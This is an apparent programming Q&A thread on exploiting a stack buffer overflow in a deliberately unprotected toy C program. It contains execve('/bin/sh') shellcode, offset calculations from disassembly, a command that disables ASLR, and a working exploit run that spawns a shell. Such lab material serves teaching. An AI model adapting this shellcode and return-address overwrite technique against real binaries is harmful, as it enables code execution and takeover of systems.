Find address start of buffer. Buffer overflow

0
votes

I am trying to take control of this program with a shellcode.

#include <string.h>
#include <stdio.h>
void func (char * arg)
{
        char name [32];
        strcpy (name, arg);
        printf ("\ nHello% s \ n \ n", name);
}
int main (int argc, char * argv [])
{
        if (argc! = 2) {
                printf ("Usage:% s NAME \ n", argv [0]);
                exit (0);
                }
        func (argv [1]);
        printf ("End of program \ n \ n");
        return 0;
}

With 40 Aes, this is when the segment violation occurs and therefore the EIP record has been overwritten. Since my shellcode is 23 characters long, I input 17 Aes to exploit it. But I need the address of the beginning of the "name" buffer for the shellcode to run there. In this case, as there is only one variable, it would be worth knowing the address of ESP, since, being the top of the stack, it will match. I've seen this program that gets you an address close to ESP:

#include <stdio.h>
unsigned long get_sp (void) {
    __asm ​​__ ("movl% esp,% eax");
}
leading void () {
    printf ("0x% x \ n", get_sp ());
}

However, I always get the segment violation signal, executing the following:

./my_program `perl -e 'print" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ". "A" x17. "ESP address" '`

The program is compiled like this:

gcc -fno-stack-protector -D_FORTIFY_SOURCE = 0 -z norelro -z execstack my_program.c -o my_program

How can I get the extreme address of the beginning of the buffer or ESP?

2
linuxstackstack-overflowbuffer-overflowexploit
Run your program in a debugger and check memory, stack, registers. etc. For easier debugging you can put the data in a char array and pass this to func instead of using argv[1]. - Bodo
Thanks, finally i got it, calculating func() before and after putting the Aes. But, I have a question... I exploited that program inside GDB but no out GDB - piramide
gdb makes sure addresses are not randomized, is ASLR disabled on the machine you're running this binary on ? - ShellCode

2 Answers

0
votes

0. Turn ASLR off

To do it easily, we can disable ASLR. In real world exploit, we will need to brute force the address as the address is randomized.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

1. Compilation

ammarfaizi2@integral:~/ex/exp$ cat my_program.c

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

void func(char *arg)
{
        char name[32];
        strcpy(name, arg);
        printf("\nHello %s \n\n", name);
}

int main(int argc, char *argv[])
{
        if (argc != 2) {
                printf("Usage: %s NAME \n", argv[0]);
                exit(0);
        }
        func(argv[1]);
        printf("End of program \n\n");
        return 0;
}
ammarfaizi2@integral:~/ex/exp$ gcc -fno-stack-protector -zexecstack -m32 my_program.c -o my_program
ammarfaizi2@integral:~/ex/exp$

2. Calculating Offset

0000122d <func>:
    122d:   f3 0f 1e fb             endbr32 
    1231:   55                      push   %ebp
    1232:   89 e5                   mov    %esp,%ebp
    /*
     *
     * At this point, we know what return address is located at
     * 0x4(%ebp).
     *
     */
    1234:   53                      push   %ebx
    1235:   83 ec 24                sub    $0x24,%esp
    1238:   e8 f3 fe ff ff          call   1130 <__x86.get_pc_thunk.bx>
    123d:   81 c3 8f 2d 00 00       add    $0x2d8f,%ebx
    1243:   83 ec 08                sub    $0x8,%esp
    1246:   ff 75 08                push   0x8(%ebp)
    1249:   8d 45 d8                lea    -0x28(%ebp),%eax
    124c:   50                      push   %eax
    124d:   e8 5e fe ff ff          call   10b0 <strcpy@plt>
    /*
     *
     * At this point, we know that the command line argument
     * is copied to -0x28(%ebp)
     *
     */
    1252:   83 c4 10                add    $0x10,%esp
    1255:   83 ec 08                sub    $0x8,%esp
    1258:   8d 45 d8                lea    -0x28(%ebp),%eax
    125b:   50                      push   %eax
    125c:   8d 83 3c e0 ff ff       lea    -0x1fc4(%ebx),%eax
    1262:   50                      push   %eax
    1263:   e8 38 fe ff ff          call   10a0 <printf@plt>
    1268:   83 c4 10                add    $0x10,%esp
    126b:   90                      nop
    126c:   8b 5d fc                mov    -0x4(%ebp),%ebx
    126f:   c9                      leave  
    1270:   c3                      ret
  • To overwrite return address from -0x28(%ebp), we need to write 0x4 - (-0x28) bytes (44 bytes).
  • We have 23 bytes shell code.
  • We need 21 bytes padding to make our payload be 44 bytes to reach return address.
  • We need 4 bytes malicious return address, we take \x11\x11\x11\x11 at the moment, as we don't yet know.

Test Execute

ammarfaizi2@integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x11\x11\x11\x11"')

Hello 1�Ph//shh/bin��PS��
                         AAAAAAAAAAAAAAAAAAAAA 

Segmentation fault (core dumped)
ammarfaizi2@integral:~/ex/exp$ dmesg | tail -n 2
[56448.175467] my_program[117895]: segfault at 11111111 ip 0000000011111111 sp 00000000ffffd3c0 error 14 in my_program[56555000+1000]
[56448.175493] Code: Bad RIP value.
ammarfaizi2@integral:~/ex/exp$

At this point we have been able to overwrite EIP value. So the next is to find the shell code address.

3. Finding Shell Code Address

Notice that segfault happens when the leave and ret undo the esp value. So we need to find how many bytes is subtracted when func stack frame is created.

Notice how esp changes

; From main function
call   func ; -4 bytes

; Setup stack frame

push   %ebp         ; -4 bytes
mov    %esp,%ebp    ; At this point %ebp = %esp

We undo -8 bytes, and our shell code is located -0x28(%ebp). So we have -48 bytes total.

Last segfault is at SP = 0xffffd3c0

Hence target return address is 0xffffd3c0 - 48 = 0xffffd390.

4. Execute Exploit

Notice that x86 is little endian byte order, so we need to reverse our payload (by byte).

  • ffffd390 we write it as \x90\xd3\xff\xff.
  • So Replace \x11\x11\x11\x11 with \x90\xd3\xff\xff
ammarfaizi2@integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x90\xd3\xff\xff"')

Hello 1�Ph//shh/bin��PS��
                         AAAAAAAAAAAAAAAAAAAAA���� 

$ date
Sat Apr  3 14:47:02 WIB 2021
$ whoami
ammarfaizi2
$ exit
ammarfaizi2@integral:~/ex/exp$
0
votes

1. Turn off ASLR and compilation

 cat /proc/sys/kernel/randomize_va_space
    0

gcc -fno-stack-protector -zexecstack -m32 prog.c -o prog2

08048474 <func>:
 8048474:       55                      push   %ebp
 8048475:       89 e5                   mov    %esp,%ebp
 8048477:       83 ec 38                sub    $0x38,%esp
 804847a:       8b 45 08                mov    0x8(%ebp),%eax
 804847d:       89 44 24 04             mov    %eax,0x4(%esp)
 8048481:       8d 45 d8                lea    -0x28(%ebp),%eax
 8048484:       89 04 24                mov    %eax,(%esp)
 8048487:       e8 e4 fe ff ff          call   8048370 <strcpy@plt>
 804848c:       b8 d0 85 04 08          mov    $0x80485d0,%eax
 8048491:       8d 55 d8                lea    -0x28(%ebp),%edx
 8048494:       89 54 24 04             mov    %edx,0x4(%esp)
 8048498:       89 04 24                mov    %eax,(%esp)
 804849b:       e8 c0 fe ff ff          call   8048360 <printf@plt>
 80484a0:       c9                      leave
 80484a1:       c3                      ret

080484a2 <main>:
 80484a2:       55                      push   %ebp
 80484a3:       89 e5                   mov    %esp,%ebp
 80484a5:       83 e4 f0                and    $0xfffffff0,%esp
 80484a8:       83 ec 10                sub    $0x10,%esp
 80484ab:       83 7d 08 02             cmpl   $0x2,0x8(%ebp)
 80484af:       74 22                   je     80484d3 <main+0x31>
 80484b1:       8b 45 0c                mov    0xc(%ebp),%eax
 80484b4:       8b 10                   mov    (%eax),%edx
 80484b6:       b8 f5 85 04 08          mov    $0x80485f5,%eax
 80484bb:       89 54 24 04             mov    %edx,0x4(%esp)
 80484bf:       89 04 24                mov    %eax,(%esp)
 80484c2:       e8 99 fe ff ff          call   8048360 <printf@plt>
 80484c7:       c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 80484ce:       e8 cd fe ff ff          call   80483a0 <exit@plt>
 80484d3:       8b 45 0c                mov    0xc(%ebp),%eax
 80484d6:       83 c0 04                add    $0x4,%eax
 80484d9:       8b 00                   mov    (%eax),%eax
 80484db:       89 04 24                mov    %eax,(%esp)
 80484de:       e8 91 ff ff ff          call   8048474 <func>
 80484e3:       c7 04 24 05 86 04 08    movl   $0x8048605,(%esp)
 80484ea:       e8 91 fe ff ff          call   8048380 <puts@plt>
 80484ef:       b8 00 00 00 00          mov    $0x0,%eax
 80484f4:       c9                      leave
 80484f5:       c3                      ret

2. Test Excute

  ./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x11\x11\x11\x11"')

Hello 1▒Ph//shh/bin▒▒PS▒▒
                                                  ̀AAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)

dmesg | tail -n 2

[82020.945063] prog2[11078]: segfault at d0080484 ip bffff71c sp bffff760 error 5
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14

Last segfault is at 0xbffff760, so: 0xbffff760 - 48 = 0xbffff718

./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x18\xf7\xff\xbf"')

Hello 1▒Ph//shh/bin▒▒PS▒▒ ̀AAAAAAAAAAAAAAAAAAAAA▒▒▒

Segmentation fault (core dumped)

dmesg | tail -n 2
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
[82857.841068] prog2[11108] general protection ip:bffff718 sp:bffff760 error:0